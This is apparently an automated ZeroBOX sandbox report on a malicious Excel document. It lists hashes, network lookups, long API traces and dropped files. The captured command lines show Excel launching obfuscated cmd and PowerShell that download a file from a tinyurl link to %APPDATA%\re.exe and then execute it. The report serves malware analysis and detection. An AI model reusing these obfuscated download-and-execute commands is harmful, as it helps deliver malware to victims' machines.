Summary | ZeroBOX

9e227b07643afd3444c4d30f0c47c3cf.xls

Antivirus
Category Machine Started Completed
FILE s1_win7_x6402 April 6, 2021, 4:40 p.m. April 6, 2021, 4:43 p.m.
Size 56.5KB
Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Last Saved By: Alexis UZAN, Create Time/Date: Sun Sep 20 21:17:44 2020, Last Saved Time/Date: Tue Sep 22 19:16:56 2020, Security: 1
MD5 9e227b07643afd3444c4d30f0c47c3cf
SHA256 d3345db33851543b968f728d2a342c49dc72b0dc633da851518d8585e53af3ce
CRC32 62802116
ssdeep 1536:1XnSGiysRchNXHfA1MiWhZFGkEld+Dr7OnkdyYWptOr5TwjJ1t:1XnSGiysRchNXHfA1MiWhZFGkEld+DrS
Yara
  • Microsoft_Office_Document_Zero - Microsoft Office Document Signature Zero

Name Response Post-Analysis Lookup
tinyurl.com 172.67.1.225
IP Address Status Action
164.124.101.2 Active Moloch
172.217.25.14 Active Moloch
172.67.1.225 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Start-Process : This command cannot be executed due to the error: This version
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: of %1 is not compatible with the version of Windows you're running. Check your
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: computer's system information to see whether you need a x86 (32-bit) or x64 (64
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: -bit) version of the program, and then contact the software publisher.
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: At line:1 char:33
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: + Start-Sleep 12; sTArt-`P`R`ocess <<<< $env:appdata\re.exe
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (:) [Start-Process], InvalidOp
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: erationException
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : InvalidOperationException,Microsoft.PowerShell.C
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: ommands.StartProcessCommand
console_handle: 0x0000008f
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e0ac0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e1040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e1040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e1040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e1240
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e1240
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e1240
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e1240
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e1240
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e1240
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e0a80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e0a80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e0a80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e1040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e1040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e1040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e0680
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e1040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e1040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e1040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e1040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e1040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e1040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e1040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e13c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e13c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e13c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e13c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e13c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e13c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e13c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e13c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e13c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e13c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e13c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e13c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e13c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e13c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e1300
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004e1300
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0066abe0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0066b1a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0066b1a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0066b1a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0066b4e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0066b4e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0066b4e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0066b4e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0066b4e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0066b4e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features GET method with no useragent header suspicious_request GET https://tinyurl.com/y3psaqmm
suspicious_features GET method with no useragent header suspicious_request GET https://tinyurl.com/app/nospam/tinyurl.com/y3psaqmm/terminated
request GET https://tinyurl.com/y3psaqmm
request GET https://tinyurl.com/app/nospam/tinyurl.com/y3psaqmm/terminated
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2352
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70af1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2352
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70b4f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2352
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70b4f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2352
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x743c1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fc0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05020000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05030000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05040000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2352
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73711000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 1835008
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02970000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f631000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0221a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f632000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02212000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02222000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ca000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02223000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02224000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0221b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02225000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026cc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02226000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026dc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05010000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05011000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05012000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05013000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05014000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05015000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05016000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05017000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05018000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05019000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0501a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0501b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Roaming\re.exe
file C:\Users\test22\Documents\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell -w 1 Start-Sleep 12; sTArt-`P`R`ocess $env:appdata\re.exe
cmdline powershell -w 1 (New-Object Net.WebClient).DownloadFile('https://tinyurl.com/y3psaqmm',($env:appdata + '\re.exe'))
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
host 172.217.25.14
file C:\Users\test22\AppData\Roaming\re.exe
parent_process excel.exe martian_process cmd /c po^wer^shell -w 1 Start-Sleep 12; sTArt-`P`R`ocess $env:appdata\re.exe
parent_process excel.exe martian_process cmd /c po^wer^shell -w 1 (New-Object Net.WebClient).DownloadFile('https://tinyurl.com/y3psaqmm',($env:appdata + '\re.exe'))
Time & API Arguments Status Return Repeated

send

buffer: nj`l )zä`v’—†›$\<#Å<;Ý5›ˆ]göa “/5 ÀÀÀ À 28)ÿ tinyurl.com  
socket: 1420
sent: 115
1 115 0

send

buffer: FBA@²üŸ9Eæ{sîÄwKrùÑÎ Ù"_œÄÍu5Ð⟈ú»«”ÑÍ{ô]ìqÖKÜѵ7úõ¸ñvÛf0Êх1a8EcÈ¢pJY|¸—駼—ô‡[â^¡Ô,†Uàk $Az/I¹¥Ò8
socket: 1420
sent: 134
1 134 0

send

buffer: `¹)S©ìnâæC‚°ÖU«{T­ÑêçT¦3ŠiÌÈ}.• &ª”3¨ålѕs²dr]ó"•Dû–­•†[?Ü~cƒ×föíF猡Ў¯‘a²Ë ›Îù]
socket: 1420
sent: 101
1 101 0

send

buffer: pÓ{è§ñ`vЩýB uJ¥2ÄNGúõ~Èÿªœhh'j´o\L¨”KÝ¢Á(²ÿ%tI¾~àùä,U®lê£-÷ю áÞÉrp X ¾ôqI0ôE\È­Èøz„‹ÿ¯×DÝ0þ‰Q“
socket: 1420
sent: 117
1 117 0
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\re.exe
parent_process excel.exe martian_process cmd /c po^wer^shell -w 1 Start-Sleep 12; sTArt-`P`R`ocess $env:appdata\re.exe
parent_process excel.exe martian_process cmd /c po^wer^shell -w 1 (New-Object Net.WebClient).DownloadFile('https://tinyurl.com/y3psaqmm',($env:appdata + '\re.exe'))
value Uses powershell to execute a file download from the command line
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Users\test22\AppData\Roaming\re.exe
file C:\Program Files\Windows Journal\Journal.exe